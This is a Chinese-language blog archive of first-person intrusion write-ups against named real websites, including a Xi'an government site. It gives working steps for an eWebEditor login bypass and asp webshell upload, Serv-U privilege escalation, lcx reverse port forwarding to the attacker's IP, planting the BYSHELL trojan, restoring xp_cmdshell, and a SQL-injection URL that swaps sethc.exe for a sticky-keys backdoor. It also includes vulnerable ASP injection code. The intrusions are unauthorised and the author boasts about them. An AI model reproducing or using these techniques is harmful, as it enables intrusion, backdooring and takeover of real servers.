Category Archives: 信息安全

今天我博客所在的服务器被ARP挂马了，看来得赶紧换个服务器了，快受不了了。在我登陆博客后台准备发帖子时候，发现登陆成功了，但是显示的是白板。试了好几下都是一样的，我猜测是不是博客被入侵，删掉了后台的部分文件。先顺手查看了一下白板页面的源文件，发现最上面多了<iframe></iframe>，看来是被挂马了。赶紧FTP登陆博客，查看了一下源文件，里面没有这段话，OK，锁定了，就是被ARP了。

进一步入侵西安人口网获得SYSTEM权限 上接[HTML攻破西安人口网]

刚刚我们拿到了他的WEBSHELL，那么我就这样放下了？当然不可能了，不断进取，不断提升权限才是黑客最喜欢的（不过，声明一下本人不是黑客！）。那什么权限才是最终的呢？这个我不好说，一般来说拿到SYSTEM权限就算是真正的成功入侵了服务器，前面那个WEBSHELL仅仅是WEB权限。听说域管理员是最高的，不过本人不才，没搞过。

好废话不多说了，我们继续。。。。

       通过WEBSHELL我们可以浏览他整个电脑上的盘符（当然要求WEBSHELL权限要相当高了），一般我们的IIS权限仅仅是GUEST权限，只能浏览当前站点下面的文件。不过这个网站显然不是那么安全，我们可以通过WEBSHELL浏览到所有盘，刚刚大概浏览了一下其他盘，没找到什么有价值的东西，不过发现他装有MSSQL。

       试着用WEBSHELL执行CMD提示找不到文件，一般来说就是被删掉了，或者是被改名字了。我们自己传一个CMD上去执行，可惜呀，其他盘没写权限，当前目录可写但是无执行权。使用WSCRIPT也无法执行CMD。

       刚刚不是发现装有MSSQL嘛，那他网站应该会用吧，不用的话装这东西干嘛？

o(∩_∩)o…哈哈

我们来翻一翻网站里面的文件，一般链接数据库的文件都在INC目录，CONFIG目录，INCLUDE目录中，结果在INCLUDE目录中找到数据库连接文件。如图：

 

为了安全，我把敏感信息涂掉了。

知道MSSQL管理帐号和密码了，而且权限是SA那就等于有SYSTEM权限了，哈哈，当然前提很多。有了这个拿来干吗？直接连他，执行存储过程，加管理员帐号和密码，登陆服务器。呵呵。刚准备去连，结果发现这个服务器是在内网中，我没法连上他，汗~~~~

       用WEBSHELL扫扫他的端口吧

 

看到1433了，确实装了MSSQL了吧！还有个43958是SERV_U，嘿嘿。。。看到这个端口开着，我们就又有机会了，试试SERV_U的那个本地溢出漏洞是否存在。

 

我们加个管理员 neeke 密码 neeke，然后提交，再次查看系统帐户：

 

刚才我们加的帐号已经有了，并且是系统用户组。可还是没用啊，又连不上他，别急，能执行命令行，还怕没权限？呵呵

我们传个LCX上去

 

 

 

我们可以看到已经传到网站目录下了。

然后继续SERV_U提权，执行命令 netstat –an >e:\www\xajswsite\netstat.txt

看看当前端口状态

没有看到3389，结合前面端口扫描结果可以肯定没开，还有种可能是改了端口号了，这里面我们觉得可疑的端口就是5529和65500

我们试试看能不能连上，在自己的机子上执行lcx –listen 51 3800

 

 

 

通过SERV_U溢出，我们执行：lcx –slave 自己的IP 51 127.0.0.1 3389（这里我还是不确定，所以就先试试3389）

 

看看有数据传输了，端口已经映射成功了。

 

 

可是链接失败，OK！换端口。

 

方法同上，只是端口改成5529

看到这个消息，可以肯定是改成5529了，只是还是无法连，我也不知道是什么原因。

看来反向，正向都没办法了，只能玩远程控制木马了。灰鸽子？不行！不免杀，不过主动防御。用哪个呢？想了会，决定用BYSHELL了，自称过好几款杀软的主动防御。我们来配置一个马。

生成后传到网站上。然后还是靠SERV_U执行他

 

 

几秒钟后：服务器上线了，被我们控制了。

为了确定就是服务器，我们PING他：

这下可以肯定了！

OK，服务器入侵完毕，SYSTEM权限已经拿到。
 

呵呵 刚才实在是闲着没事干，就找了个网站检测检测，俺不是什么高手，搞不了什么大网站，就是喜欢没事研究研究，今天在自己的地盘上献个丑。
目标：http://www.xianfp.gov.cn/
发现有ewebeditor存在。
http://www.xianfp.gov.cn/ewebeditor
于是提交：
http://www.xianfp.gov.cn/ewebeditor/admin_login.asp
打开是这样的：

MD，没输入密码的地方啊，就算知道密码和用户名也没用啊。。果真如此？我们来试试：
把当前页保存到本地为html文件，打开修改代码，原来的是这样的：

我们加上一个输入密码的框变成如下：

记住，一定还要修改表单action后面提交路径，注意看两幅图的差别！
然后我们双击打开本地的这个html文件，打开后你会发现很难看

，o(∩_∩)o...哈哈 没事，虽然难看但是实用啊，接着我们输入用户名admin 密码admin
回车。OK登陆成功：

我们加样式，随便选择一个点他后面的拷贝：

之后就多了一个名为standard1的样式，然后点设置，文件上传类型加上asp或asa或cer等可以被asp.dll解析的文件后缀，之后保存。
然后选择预览，接着随便点一个上传文件的，选上我们的asp木马就可以传上去了，成功拿到Webshell。

留个txt走人。
http://www.xianfp.gov.cn/neeke.txt

兄弟们（主要是我班里的同学），看到没，其实学到最简单的HTML语言就是如此的有用，如果这里我不懂HTML的，肯定是没法入侵他的，即便是我知道他密码。
现在兄弟们，知道学好这些东西是多么的有用了吧？还有JSP,JAVA,C语言,MSSQL等数据库，这些的用处是大大滴！！！o(∩_∩)o...哈哈，所以大家一定要好好学！！！
注意：此帐号和密码本人已改，防止他人继续搞破坏。

[进一步入侵西安人口网获得SYSTEM权限]

入侵时构造注入点：

<%       
strSQLServerName = "localhost"     '服务器名称或地址
strSQLDBUserName = "sa"         '数据库帐号
strSQLDBPassword = ""         '数据库密码
strSQLDBName = "test"           '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>

<!--#include file="xx.asp"-->
<%
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "Select * From FS_DS_Class where ID=" & id
rs.open strSQL,conn,1,3
rs.close
%>

附加数据库：

EXEC sp_attach_db @dbname = N'czsonline',
@filename1 = 'e:\mydata.mdf',
@filename2 = 'e:\mylog.ldf'

看看菜鸟是如何搞定XX信息港的目标：http://xxx.vnet.cn/ 其实以前拿到过他的服务器，放了很多后门，不过都没多久没了。记得几个月前又进去了一次，再次放了很多后门，过了几天再次丢失 - -！最近一直在上课，也没时间搞这方面的东西，昨天晚上闲着没事干，就想起了她（不要乱想哦，我指的是这个网站，o(∩_∩)o...哈哈）。目标信息： 1.外网 2.开放3389 3.装有MSSQL，但没有对外开放1433 4.有注入点且SA权限 下面开始步入正题，其实他的SA密码我都有而且他一直没有改密码（后面拿到WEBSHELL查看证实！），只是没对外开1433，所以也没用。没事干，找出她的注入点（我想这个就不用多讲怎么找了吧），得到权限是SA的。直接用NBSI执行NET USER XX XX /ADD 没有成功。难道把这个删了？再执行NET1 USE XX XX /ADD还是没有成功。看来是把XP_CMDSHELL删了，尝试恢复回去，结果不成功。接下来尝试了很多方法都没有成功。哎，算了，可能人品问题吧。那总该有备份权限吧，先拿个WEBSHELL再说，于是乎用NBSI备份了一句话上去。 尝试保存一个大马失败，权限设置的很死，只能用这个备份出来的一句话。怎么办呢，反正也是闲着没事干，把他整个盘都一个一个翻翻看看。找到一个GHOST目录， 看到里面有备份的系统，我突然有了一种很傻的冲动：下他一个系统下来自己恢复到自己电脑上，然后用 SAMInside破解SAM文件，（你可能会说，那干嘛不直接下她SAM文件破，一句话：下不了！），经过再三的思想斗争，我决定下吧！于是。。。 等了半天没反应，估计是因为太大了吧（因为我尝试下载其他文件可以！），浏览器直接卡住了。OK，放弃，继续翻。。。。发现个目录比较可疑，进去看看发现XPLOG70.DLL（我靠，原来在这里备份着，我就说怎么恢复不了呢。）爽啊~~~~ 执行： Exec master.dbo.addextendedproc 'xp_cmdshell', 'e:\backup\sql\xplog70.dll' 完成后，再去运行了一次添加用户，还是不行。。。。。看来人品真够背的。OK，先放那吧，不整了，先睡觉明天再想办法。一夜过去了。。。又是一个晚上。。。依然闲着没事干，找点资料看看吧，结果在黑鹰下到了《JHACKJ垃圾技术挑战变态SA提权》这个教程。看到它里面列出了一些代码是我没有试过的。于是乎赶紧用记事本抄下来，JHACKJ在他的入侵中的这段代码没有成功，但是我用来就成功了。o(∩_∩)o...哈哈 看来今天我的人品有所好转啊。代码如下： declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe' 大家一看就明白是怎么个意思了吧，就是那个5个SHIFT后门，其实这个我也想过，我是想用WEBSHELL传个上去。可是结果没有写权限。 OK，我们URL递交： http://xxx.vnet.cn/info/ad1.asp?lbid=901;declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe' 结果返回的页面和前一个页面不一样，一般来说不一样就是没有成功了。不过我还是抱着试一试的心态连上3389，5shift，OK，explorer.exe如期运行了。 下面就是找到CMD运行，再加管理，结果翻遍SYSTEM32也没找到CMD， 确定是被删掉了而且NET.EXE和NET1.EXE都没了。我们在计算机管理里面加，就不用那几个东西了。 然后我们登陆。 管理员也在线啊。。。。。赶紧闪。。。